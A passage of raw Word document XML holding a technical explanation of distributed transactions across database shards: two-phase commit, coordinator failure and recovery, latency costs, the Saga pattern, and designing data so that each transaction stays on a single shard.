    <w:p w14:paraId="5E30E83D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Returns: PREPARED (vote YES) or ABORT (vote NO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154A5271" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F496A34" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard is now "in doubt" — it has prepared but doesn't know the global outcome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7C2CBA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Locks remain held on prepared resources (blocking other transactions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCC9B43" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D1BF3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Phase 2 — Commit (or Abort):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D6257A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  If all shards voted YES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466877E3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Coordinator writes COMMIT to its own WAL (durable decision record)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC0CA4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Coordinator → Shard 1: "COMMIT tx_123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0DCCDE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Coordinator → Shard 2: "COMMIT tx_123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F791997" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Each shard: commits, releases locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D7B7DC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B52C17" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  If any shard voted NO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22695EE6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Coordinator → all shards: "ABORT tx_123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6A70A7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Each shard: rolls back, releases locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71707B00" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="032BA205" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The coordinator failure problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF34666" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Coordinator crashes after Phase 1 but before Phase 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE093D1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Both shards are "in doubt" (prepared but uncertain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0893A4D4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Both shards hold locks (blocking all conflicting transactions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2326FBB6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Shards cannot proceed without coordinator's decision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29932C6A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1BBA4C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Recovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C6BCA4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Coordinator restarts, reads its WAL for in-doubt transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FC0E9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    If COMMIT record found: send COMMIT to all shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D8829C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    If no COMMIT record: send ABORT to all shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08177DF5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0847C6F8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Blocking window: from coordinator crash until coordinator recovers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A8DCF4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Locks held during this entire period → transactions queued or timed out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3153B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    For HA coordinator: deploy coordinator with automatic failover (Raft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08652325" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → Reduces blocking to failover time (seconds to minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B01F47F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2PC performance characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050D6C81" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F084576" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>2PC cost analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5DAD57" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Phase 1: coordinator → shards (1 RTT) + shard prepare (disk fsync) + shards → coordinator (1 RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CFA49E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Phase 2: coordinator → shards (1 RTT) + shard commit (disk fsync) + shards → coordinator (1 RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEB1C37" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A62327" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Minimum latency: 4 RTTs + 2 disk fsyncs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059F595A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D337E6D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  For local-datacenter shards (1ms RTT, 1ms fsync):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B86064C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    2PC latency: 4 × 1ms + 2 × 1ms = 6ms overhead per cross-shard transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAC5E42" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A90336" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  For cross-region shards (100ms RTT, 1ms fsync):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED048F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    2PC latency: 4 × 100ms + 2 × 1ms = 402ms overhead per cross-shard transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D4C8E6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692C0F6C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  This is why cross-shard transactions should be avoided whenever possible:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A588357" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Design data locality: put related data that transacts together on the same shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B38A08" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Design for single-shard transactions: the shard key determines locality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C31E2F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Saga Pattern — Avoiding 2PC for Long Transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2269E3A4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>For long-running operations that span shards (and cannot hold locks for their duration), the Saga pattern replaces a single distributed transaction with a sequence of local transactions with compensating actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534EDA00" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E2086" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Saga: Transfer $100 from User A (Shard 1) to User B (Shard 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20026516" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="16ECBD82" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">Step 1 (Shard 1): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132EE6C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Local transaction: debit $100 from A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0957AC12" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  If success → publish "debit_completed" event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0370F13B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Compensation: "credit_back" event → credit $100 back to A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE30AE0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0724EDD3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Step 2 (Shard 2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC45ED7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Local transaction: credit $100 to B (triggered by "debit_completed" event)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7737DF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  If success → publish "transfer_completed" event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA730B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  If failure → publish "credit_failed" event → trigger compensation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F04B9FD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23601320" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Compensation (if Step 2 fails):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA81FA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Compensating transaction on Shard 1: credit $100 back to A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE91501" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED7C89C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3738159D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Atomicity: NOT guaranteed (intermediate states visible during execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA1F522" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Consistency: eventual (after all steps and compensations complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49461608" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Isolation: NOT guaranteed (other transactions see intermediate states)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C81457" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C10281" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  The intermediate state (A debited, B not yet credited) is visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2589F1D8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Must be acceptable for the business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380FC349" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4FC39CDD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Saga orchestration vs choreography:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E659FDB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Orchestration: central coordinator (saga orchestrator) drives each step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB258AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Pro: explicit flow, easier to reason about, easier to monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4400763B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Con: orchestrator is a single point of coupling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C494AA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708838CA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Choreography: each service reacts to events, publishes results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F780F7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Pro: loosely coupled, each service owns its behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161B46A5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Con: harder to trace, harder to understand overall flow, harder to debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F71E349" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="3F293BF7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Where Sagas are appropriate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEE4168" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Order processing (charge card → reserve inventory → ship)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5001FA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Hotel booking (reserve room → charge card → confirm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E68D3CD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Money transfer (debit source → credit destination)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66921C3D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5235EB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Where Sagas are NOT appropriate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB1F1D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Operations requiring strong isolation (financial ledger reconciliation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11154B7E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Operations where intermediate states cause business harm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FDDDD7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Use 2PC or redesign to avoid cross-shard transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E34735F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Designing for Single-Shard Transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3ADD7F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The best solution to distributed transactions is to not have them. Data model design that collocates related data on the same shard enables single-shard transactions with full ACID guarantees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5650571C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632A9E51" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Anti-pattern: Transaction crosses shard boundary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75087EC3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard key: user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F3E9E9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65617F36" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Transfer between users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A2636" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    UPDATE accounts SET balance = balance - 100 WHERE user_id = A  -- Shard 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6578DF86" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    UPDATE accounts SET balance = balance + 100 WHERE user_id = B  -- Shard 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692405D2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
